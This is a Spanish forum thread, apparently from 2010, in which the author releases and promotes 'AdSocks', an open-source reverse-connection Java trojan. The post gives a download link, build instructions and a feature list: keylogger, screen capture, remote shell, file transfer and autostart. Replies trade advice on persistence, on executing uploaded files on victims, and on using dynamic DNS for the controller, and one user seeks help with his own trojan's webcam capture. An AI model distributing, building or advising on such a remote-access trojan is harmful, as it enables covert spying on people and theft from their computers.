|
Título: Troyano OpenSource AdSocks v0.5.1 Publicado por: AngelCruel en 8 Octubre 2010, 22:04 pm link de descarga:
http://sourceforge.net/projects/adsocks si encuentran algun bug postearlo. Es un troyano de conexión inversa, el servidor se conecta al cliente, asi es mas facil que el cliente abra el puerto que tener que abrir el puerto en todos los servers. - Captura del escritorio - control del mouse - subir y bajar archivos - linea de comandos - keylogger - escucha en 3 puertos. - autogenerador del server - Algunas caracteristicas adicionales estan disponible en la version privada http://adsocks.sytes.net (http://adsocks.sytes.net) (http://farm5.static.flickr.com/4104/5202743451_5006933b88_b_d.jpg) FORMA DE COMPILAR: esta compuesto de 3 proyectos: lib.class, troyano, adsocks. compilen el proyecto lib.class despues vayan a la carpeta dist y renombren el lib.class.jar generado por lib.class y lo copian en la carpeta src del proyecto troyano. Lo mismo para con el proyecto troyano compilan luego se van a la carpeta dist renombran el archivo troyano.jar generado por lib.class y lo copian en la carpeta src del proyecto adsocks. Y por ultimo compilan el proyecto adsocks y ya tienen el adocks listo para su uso. update 0.3.0: -el servidor ya funciona en linux pero no se auto inicia update 0.4.0: - se ha agregado nueva opcion keylogger - ahora se crea 2 sevidores uno sin autuinicio para pruebas. - opcion update compatible con servidor 0.3.0 update 0.4.1: - ya se autoinicia en linux - se puede activar/desactivar el mouse updade 0.4.2: - se ha arreglado problemas en la linea de comandos que dejaba sin conexion al servidor. update 0.5.0: - se ha corregido un error grave al bajar archivos - se ha mejorado la interfaz para juntar todas las opciones - algunas adiciones listas para un futuro no muy lejano update 0.5.1: - se ha mejorado la opcion update de un server para que se cierre lo que esta ejecutandose en memoria y se autoejecute la nueva version. Nota: El autor no se hace responsable por el mal uso que le den a la herramienta. Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: usuario oculto en 8 Octubre 2010, 22:10 pm En subir archivo lo ejecuta?
Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: Debci en 8 Octubre 2010, 22:17 pm A que te refieres con auto-arranque?
Saludos Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: usuario oculto en 8 Octubre 2010, 22:24 pm Subirlo y que se ejecute en el equipo.Pero ahora lo testeo y pruebo con command.
edito: le doy a cambiar puerto y sigue todo igual. Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: AngelCruel en 8 Octubre 2010, 22:59 pm MÃηsaηα:
no se ejecuta hay que ejecutarlo con el command. el archivo subido se copia en c:\windows\temp Debci: a que cuando apagas la maquina y la vuelvas a encender se vuelva a ejecutar el servidor. nota: la opción update no funciona bien me olvide arreglarlo. Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: [L]ord [R]NA en 8 Octubre 2010, 23:12 pm AngelCruel, se supone que todo malware deberia tener esa opcion y mas cuando lo que se quiere es tener acceso remoto a un equipo.
Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: AngelCruel en 8 Octubre 2010, 23:32 pm Lord R.N.A.:
yo lo veo mas facil ir a la opción de command en el adsocks y poner: exed c:\windows\temp\nombredelarchivo.exe ese es el comando para ejecutar un archivo con el directorio completo. talvez el archivo que sube no es un ejecutable. Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: [L]ord [R]NA en 9 Octubre 2010, 02:29 am no me refiero a eso... me refiero a iniciar con el sistema.
Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: Leyer en 9 Octubre 2010, 03:13 am 1. El servidor no corre en linux
2. Falta un buen manejo de memoria 3. Errores al iniciar el servidor 4. Falta un buen manejo de excepciones 5. Desordenado 6. Problemas el cambiar puerto 7. Trabaja mas orientado a objetos luego miro mas a fondo :xD Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: AngelCruel en 9 Octubre 2010, 06:19 am Lord R.N.A.:
ok LEYER: 1. si es cierto nesecito que en una linea de bash se agregue el autoarranque en rc.local haber quien postea la solución y tambien en mac. 3. no agregaba en la lista a los servidores cuando se conectaban varios al mismo tiempo ya esta arreglado gracias por la info. 6. lastimosamente hay que reiniciar el programa despues de cambiar el puerto, pero ahora escucha en 3 puertos. Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: usuario oculto en 9 Octubre 2010, 09:16 am Ya si que me funciona, ya que lo has arreglado, en un momento pensé que era problema mio.MMm.. al final se inicia con windows o no?
Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: AngelCruel en 9 Octubre 2010, 20:35 pm MÃηsaηα: si se inicia con windows lo que falta es que se inicie en linux y mac. Título: Re: AdSocks v0.2.0 se ha agregado autoarranque al troyano Publicado por: alexkof158 en 9 Octubre 2010, 21:54 pm Sistemas Operativos en que opera este RAT?
Título: Re: AdSocks v0.3.0 se ha agregado autoarranque al troyano (codigo fuente completo) Publicado por: AngelCruel en 11 Octubre 2010, 07:23 am alexkof158:
en windows funciona al 100 % en linux el autoarranque no funciona (el servidor funciona al 100 % pero falta probar si se conecta construido desde el adsocks) y en mac no se como ira jeje Título: Re: Troyano AdSocks v0.4.1 agregado nueva opcion Keylogger autoinicio en Linux Publicado por: ^HtCc en 19 Octubre 2010, 13:45 pm Que programa usais para compilar en java??
Título: Re: Troyano AdSocks v0.4.1 agregado nueva opcion Keylogger autoinicio en Linux Publicado por: AngelCruel en 20 Octubre 2010, 01:31 am en netbeans son 3 proyectos:
lib.class se compila y se copia en troyano quitandole la extension, luego este se compila y se copia en adsocks cambiandole el nombre a lib.class. Título: Re: Troyano AdSocks v0.4.1 agregado nueva opcion Keylogger autoinicio en Linux Publicado por: magarcan en 24 Octubre 2010, 13:49 pm Una cuestioncilla. A la hora de crear el servidor y meter nuestra ip, ¿se podría utilizar algún servidor del estilo no-ip y similares?
PD: Gracias por el curro!! Título: Re: Troyano AdSocks v0.4.1 agregado nueva opcion Keylogger autoinicio en Linux Publicado por: AngelCruel en 25 Octubre 2010, 00:26 am magarcan: si puedes utilizar. Título: Re: Troyano AdSocks v0.4.1 agregado nueva opcion Keylogger autoinicio en Linux Publicado por: Jaixon Jax en 25 Octubre 2010, 03:04 am magarcan: si puedes utilizar. ¿Estas seguro que el server resuelve la IP del dominio? :¬¬ Título: Re: Troyano AdSocks v0.4.1 agregado nueva opcion Keylogger autoinicio en Linux Publicado por: AngelCruel en 27 Octubre 2010, 17:45 pm el server no, pero las paginas del estilo no-ip hacen eso, tambien esta el dyndns. Título: Re: Troyano OpenSource AdSocks v0.5.1 agregado nueva interfaz y un pequeño cambio Publicado por: paju1986 en 9 Diciembre 2010, 12:33 pm Hola, yo también estoy escribiendo un troyano pero no en Java sino en C++ con las librerias Qt4, te queria preguntar si tu troyano tiene soporte para capturar Webcam ya que esto me trae de cabeza para hacerlo multiplataforma. Si es asi ¿Como lo has logrado?.
Yo lo estoy intentando con OpenCV pero tengo problemas al compilarlo de forma estática y no encuentro nadie que sepa una solución. Por si a alguien le interesa aqui esta el post de mi troyano: http://foro.elhacker.net/analisis_y_diseno_de_malware/demonio_un_troyano_con_licencia_gpl-t313241.0.html Título: Re: Troyano OpenSource AdSocks v0.5.1 agregado nueva interfaz y un pequeño cambio Publicado por: AngelCruel en 12 Diciembre 2010, 04:39 am paju1986: tenia que usar el jmf pero la verdad que aun no he intentado como quedaria. |